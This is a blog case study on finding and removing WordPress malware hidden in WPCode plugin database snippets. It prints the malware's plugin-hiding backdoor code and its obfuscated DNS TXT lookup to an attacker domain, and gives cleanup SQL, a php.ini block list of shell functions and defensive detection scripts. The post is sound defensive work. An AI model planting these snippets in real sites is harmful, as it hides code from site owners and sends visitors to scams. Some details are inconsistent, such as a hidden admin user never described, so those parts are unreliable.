DEV Community

MD Pabel

Originally published at mdpabel.com

Case Study: Fix WPCode Redirect Malware – The “Database Ghost” Hack (2026 Guide)

Quick Fix: WPCode Redirect Malware

The Problem: Mobile visitors are being redirected to spam sites, but security plugins (Wordfence, Sucuri) report the site is clean.

The Cause: The malware is NOT in the plugin files. It is injected into the WordPress Database (wp_posts and wp_options) as a hidden “Snippet” inside the WPCode plugin logic.

The Discovery: A manual audit revealed 47 folders in the plugins directory, but only 46 active plugins in the dashboard. The malware was hiding the WPCode plugin from the admin list.


“I have re-installed WordPress core. I have deleted all my plugins. I have scanned the site ten times. Why is my site STILL redirecting to a lottery scam on my iPhone?”

This is the email I received from a client yesterday. They were desperate. They had done everything “right,” but the redirects persisted.

The reason the scanners failed is simple: The malware wasn’t in the files.

In this case study, I am going to walk you through a specific, nasty infection I call the “Database Ghost.” It targets the popular WPCode plugin (formerly Insert Headers and Footers), hides it from your dashboard, and runs entirely from your database tables.

If your security plugins are giving you a green “All Clear” checkmark but your traffic is tanking, this guide is for you.


Signs of the WPCode “Database Ghost” Infection

The most dangerous malware is the kind you can’t see. This infection is designed to deceive the site owner while exploiting the site’s visitors.

1. Conditional Redirects (The “User-Agent” Trap)

The first thing I noticed when auditing the client’s site was that it worked perfectly on my desktop computer. I clicked every link, refreshed the page—nothing happened.

But when I switched to my iPhone (using 4G, not WiFi), the site instantly redirected to a malicious domain: red.global-reward-sweeps.com.

Why do hackers do this?

  • Evasion: Site owners usually edit and check their sites from Desktops. By targeting only mobile devices (Android/iOS), the malware can stay active for months without the owner noticing.
  • Difficulty: It is much harder to “Inspect Element” or view source code on a mobile phone, making it harder for non-experts to debug.

2. The “Ghost” Plugin

The client insisted they used the WPCode plugin to manage their Google Analytics tags. However, when I looked at the WordPress Dashboard > Plugins list, WPCode was missing.

They assumed they had accidentally deleted it. But—and here is the key—their Google Analytics tags were still firing on the frontend. The plugin was running, but it was invisible.

3. Why Wordfence & Sucuri Failed

This is the part that frustrates everyone. Security plugins like Wordfence work primarily by File Integrity Scanning. They compare your files (/wp-content/...) against the official WordPress repository.

Since this malware stores its malicious payload in the Database (specifically in wp_posts as a snippet and wp_options as settings), the actual PHP files of the plugin often look legitimate. The scanner sees a “Snippets Plugin” running a snippet—which is exactly what the plugin is designed to do. It assumes the behavior is authorized.


How to Find Hidden Malware in WordPress

Since the automated tools failed, I had to perform a manual forensic audit. This is the exact process I use to find “Ghost” malware.

Step 1: The “Plugin Count” Trick

This is my favorite trick for finding hidden malware.

  1. I logged into the WordPress Admin Dashboard. Count: 46 Active Plugins.
  2. I connected to the server via SFTP (FileZilla).
  3. I navigated to /wp-content/plugins/ and counted the folders. Count: 47 Folders.

[Image: server file manager showing 47 plugin folders installed; WordPress dashboard showing only 46 active plugins]

The Smoking Gun: The folder insert-headers-and-footers (the slug for WPCode) was physically present on the server, but the WordPress dashboard refused to acknowledge it. Code cannot disappear from the UI unless it is programmed to hide.
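The "plugin count" comparison above can be scripted. The following Python script is an added example (not the author's tooling): it walks a plugins directory the way WordPress's own get_plugins() does, reads each plugin's "Plugin Name:" header, and reports anything on disk that is missing from a list of names copied from the Plugins screen. The plugin folders, headers and dashboard list it uses are constructed fixtures, not data from the client's site.

```python
import os
import re
import tempfile

# Matches the "Plugin Name:" line of a WordPress plugin header comment.
HEADER_RE = re.compile(r"^\s*\*?\s*Plugin Name:\s*(.+?)\s*$", re.MULTILINE)


def discover_plugins(plugins_dir):
    """Walk a plugins directory and return {'folder/main.php': 'Plugin Name'}.

    This is what get_plugins() sees on disk, before any 'all_plugins'
    filter gets a chance to unset entries from the list.
    """
    found = {}
    for folder in sorted(os.listdir(plugins_dir)):
        folder_path = os.path.join(plugins_dir, folder)
        if not os.path.isdir(folder_path):
            continue
        for name in sorted(os.listdir(folder_path)):
            if not name.endswith(".php"):
                continue
            with open(os.path.join(folder_path, name), encoding="utf-8", errors="replace") as fh:
                head = fh.read(8192)  # WordPress reads only the first 8 KB for headers
            match = HEADER_RE.search(head)
            if match:
                found[f"{folder}/{name}"] = match.group(1)
                break  # the first file carrying a header is the plugin's main file
    return found


def audit_plugins(plugins_dir, dashboard_names):
    """Compare what is on disk with the plugin names the dashboard shows.

    dashboard_names: names copied from the WordPress Plugins screen (the list
    the author counted by hand). Anything on disk that is absent from it is a
    candidate "ghost" plugin.
    """
    on_disk = discover_plugins(plugins_dir)
    visible = set(dashboard_names)
    folder_count = sum(
        os.path.isdir(os.path.join(plugins_dir, f)) for f in os.listdir(plugins_dir)
    )
    hidden = {basename: name for basename, name in on_disk.items() if name not in visible}
    return {"folder_count": folder_count, "dashboard_count": len(visible), "hidden": hidden}


def build_sample_plugins_dir():
    """Create a constructed plugins directory (a fixture, not a real site):
    two ordinary plugins plus the WPCode folder the dashboard no longer lists."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    fixtures = {
        "example-seo/example-seo.php": "Example SEO",
        "example-cache/example-cache.php": "Example Cache",
        "insert-headers-and-footers/ihaf.php": "WPCode",  # header text is constructed
    }
    for basename, plugin_name in fixtures.items():
        path = os.path.join(root, basename)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(f"<?php\n/**\n * Plugin Name: {plugin_name}\n */\n")
    return root


# Constructed dashboard list: the two plugins the admin can see; WPCode is missing.
SAMPLE_DASHBOARD_NAMES = ["Example SEO", "Example Cache"]

if __name__ == "__main__":
    report = audit_plugins(build_sample_plugins_dir(), SAMPLE_DASHBOARD_NAMES)
    print(f"folders on disk: {report['folder_count']}, "
          f"plugins in dashboard: {report['dashboard_count']}")
    for basename, name in report["hidden"].items():
        print(f"HIDDEN: {name} ({basename})")
```

On a real site, point `audit_plugins` at /wp-content/plugins/ and paste the dashboard names into the list; a folder whose header name is absent from the dashboard is exactly the discrepancy described above (47 folders, 46 entries).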

Step 2: The Database Deep Dive

Since I suspected the malware was “Living off the Land” (using the database), I opened phpMyAdmin to inspect the raw data.

I ran a search query in the wp_options table for the string auto_update_code. I found an entry containing a massive block of obfuscated PHP code. This was the “Brain” of the malware.

Next, I checked the wp_posts table. WPCode stores your custom snippets as a Custom Post Type. I found a post with post_type = 'wpcode' that contained the redirect script.

[Image: phpMyAdmin search results showing malicious code injected into the wp_options table]


Technical Analysis: How the “Database Ghost” Works

Once I extracted the code from the database, I reverse-engineered it to understand its evasion techniques.

1. The “Invisibility Cloak” Logic

The malware injects a filter into your WordPress initialization process. It checks if the current user is an Administrator, and if so, it removes WPCode from the plugin list.


// IF user is Admin AND specific URL parameter is missing
if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {

    // 1. Hide the menu via CSS
    add_action('admin_print_scripts', function () {
        echo '<style>#toplevel_page_wpcode { display: none; }</style>';
    });

    // 2. Unset the plugin from the global array
    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });
}


The Backdoor: The hacker left a secret key: ?show_all=1. If they visit this URL, the plugin reappears, allowing them to modify the malware settings without needing FTP access.

2. The Firewall Bypass (DNS Tunneling)

This is the most technically impressive part of the infection. Firewalls (WAFs) block malicious HTTP requests. If a script tries to download malware.js from a Russian server, the WAF blocks it.

So, this malware doesn’t use HTTP. It uses DNS Tunneling.


// Build the lookup name from the victim's hostname and server IP
// ($host and $ip are set earlier in the snippet)
$req = $host . '.' . $ip . '.webdmonitor.io';

// Perform a DNS TXT lookup; the function name is assembled from pieces so a
// search for the literal string "dns_get_record" never finds it
$v = "d" . "ns_" . "get" . "_rec" . "ord"; // Obfuscated "dns_get_record"
$s = @$v($req, DNS_TXT); // '@' silences any lookup error


It sends a “system check” (DNS Lookup) to a malicious nameserver (webdmonitor.io). The nameserver replies with a TXT record containing the Redirect URL encoded in Base64. Your server decodes it and redirects the user.

Because every server needs DNS to function (to send emails, run updates, etc.), firewalls allow this traffic to pass 100% of the time.
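Firewalls let the lookup through, but a resolver log still records it, and the lookup name built above has a shape that ordinary DNS traffic does not: a hostname, then an IPv4 address spelled out as four labels, then the carrier domain, all queried as TXT. The script below is an added example (not from the article) that reads a constructed dnsmasq-style query log and groups TXT queries with an embedded IPv4 address by carrier domain; the log lines, the client address 203.0.113.10 and the hostname example.com are made up for the example.

```python
import re

# Constructed dnsmasq-style resolver log (not a real capture). Client 203.0.113.10
# stands in for the web server; the TXT query names carry its hostname and IP as
# labels under the carrier domain, the way the snippet above builds $req.
SAMPLE_RESOLVER_LOG = """\
query[A] api.wordpress.org from 203.0.113.10
query[TXT] example.com.203.0.113.10.webdmonitor.io from 203.0.113.10
query[MX] example.com from 203.0.113.10
query[TXT] _dmarc.example.com from 203.0.113.10
query[TXT] example.com.203.0.113.10.webdmonitor.io from 203.0.113.10
query[A] example.com from 198.51.100.7
"""

QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<qname>\S+)\s+from\s+(?P<client>\S+)")
# Four consecutive numeric labels inside a name: an IPv4 address smuggled as DNS labels.
EMBEDDED_IPV4_RE = re.compile(r"(?:^|\.)(\d{1,3}(?:\.\d{1,3}){3})(?:\.|$)")


def parse_queries(log_text):
    """Yield (qtype, qname, client) for every query line; other lines are skipped."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("qtype"), m.group("qname").lower().rstrip("."), m.group("client")


def split_beacon(qname):
    """Split '<host>.<ip>.<carrier>' into its parts, or None when no IPv4 is embedded."""
    m = EMBEDDED_IPV4_RE.search(qname)
    if not m:
        return None
    host = qname[: m.start(1)].rstrip(".")
    carrier = qname[m.end(1):].lstrip(".")
    return host, m.group(1), carrier


def find_tunnel_beacons(log_text):
    """Group TXT queries that embed an IPv4 address by the carrier domain they go to."""
    findings = {}
    for qtype, qname, client in parse_queries(log_text):
        if qtype != "TXT":
            continue  # ordinary A/MX lookups are not the pattern we are after
        parts = split_beacon(qname)
        if parts is None:
            continue  # e.g. _dmarc.example.com: a legitimate TXT lookup, left alone
        host, ip, carrier = parts
        entry = findings.setdefault(
            carrier, {"count": 0, "embedded_host": host, "embedded_ip": ip, "clients": set()}
        )
        entry["count"] += 1
        entry["clients"].add(client)
    return findings


if __name__ == "__main__":
    for carrier, info in find_tunnel_beacons(SAMPLE_RESOLVER_LOG).items():
        print(f"{carrier}: {info['count']} TXT beacon(s) from {sorted(info['clients'])}, "
              f"leaking {info['embedded_host']} / {info['embedded_ip']}")
```

The DMARC lookup in the sample is deliberately there: TXT queries are normal for mail, so the rule keys on the embedded address and the repeat count rather than on the record type alone. A carrier domain that shows up this way from a web server is worth checking against the wp_posts snippets described in the next section.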


How to Remove “Database Ghost” Malware

Warning: Do not just delete the plugin folder. The malware is in your database. If you reinstall the plugin later, it will read the database and re-infect itself.

Step 1: Manual File Deletion

You cannot delete the plugin from the dashboard because you can’t see it.

  1. Connect to your site via FTP/SFTP or cPanel File Manager.
  2. Navigate to /wp-content/plugins/.
  3. Right-click the insert-headers-and-footers folder and Delete it.

Step 2: Clean the wp_options Table

The malware stores its configuration in the options table. You need to access your database via phpMyAdmin.

Run the following SQL query to find the malicious entries:


SELECT * FROM wp_options 
WHERE option_name IN ('_pwsa', 'd', 'auto_update_code', 'wpcode_global_error');


Action: Delete any rows that are returned.

[Image: SQL query results showing malicious entries in the wp_options table]

Step 3: Clean the wp_posts Table

This is where the “Snippet” lives. The malware saves itself as a custom code snippet so WPCode executes it automatically.

Run this query:


SELECT * FROM wp_posts 
WHERE post_type = 'wpcode' 
AND post_content LIKE '%dns_get_record%';


Action: Delete any posts found. Also, look for any suspicious snippets you didn’t create.

[Image: hidden malware code inside the wp_posts table in phpMyAdmin]

Step 4: Flush Transients & Object Cache

The malware is smart. It caches the redirect URL in a “Transient” (a temporary cache stored in wp_options) for 24 hours. Even if you delete the plugin and clean the database, the redirect URL might still be sitting in that cache or in your object cache.

Run this query to kill the cache:

-- In LIKE, '_' is a single-character wildcard; escaping it as '\_' matches the literal prefix only
DELETE FROM wp_options WHERE option_name LIKE '\_transient\_exp%';

Finally, clear your Redis/Memcached and Cloudflare/CDN caches.


How to Prevent Future Database Infections

Now that the “Ghost” is gone, how do you stop it from coming back?

1. Disable dns_get_record

Unless you are running a specific network diagnostic tool, your WordPress site never needs to perform raw DNS lookups. This function is almost exclusively used by hackers for tunneling.

Add this to your php.ini file:

disable_functions = dns_get_record, exec, passthru, shell_exec, system

2. Least Privilege Principles

This malware successfully created a hidden Admin user because the database user had full permissions. Ensure your database user only has the permissions it needs on its own database, and consider a File Integrity Monitor that runs server-side (like cPanel’s built-in scanner) rather than relying on a plugin alone.


FAQ: WPCode & Database Malware

Is the WPCode plugin unsafe to use?

No. WPCode is a legitimate, well-coded plugin. The issue is not a vulnerability in the plugin, but rather that hackers are “infecting” it. Because the plugin is designed to run custom code (like Analytics), hackers love it because they can hide their malware inside it, and security scanners assume the code is legitimate.

Can I just reinstall the plugin to fix it?

No. This is the biggest mistake people make. If you delete the files and reinstall the plugin, the fresh plugin will read the old wp_options and wp_posts tables from your database. The malware will instantly re-inject itself into the new files. You MUST clean the database first.

How did the malware get into the database?

Typically, the entry point is a compromised Administrator account or a vulnerability in a different plugin. Once the hacker gets in, they inject the code into the database and hide the traces. This ensures that even if you update your plugins, the malware survives.


Still dealing with redirects? Database malware is high-risk. One wrong SQL command can break your site. If you are uncomfortable editing database tables, hire me for a professional malware removal service. I specialize in forensic database cleaning that automated tools can’t handle.
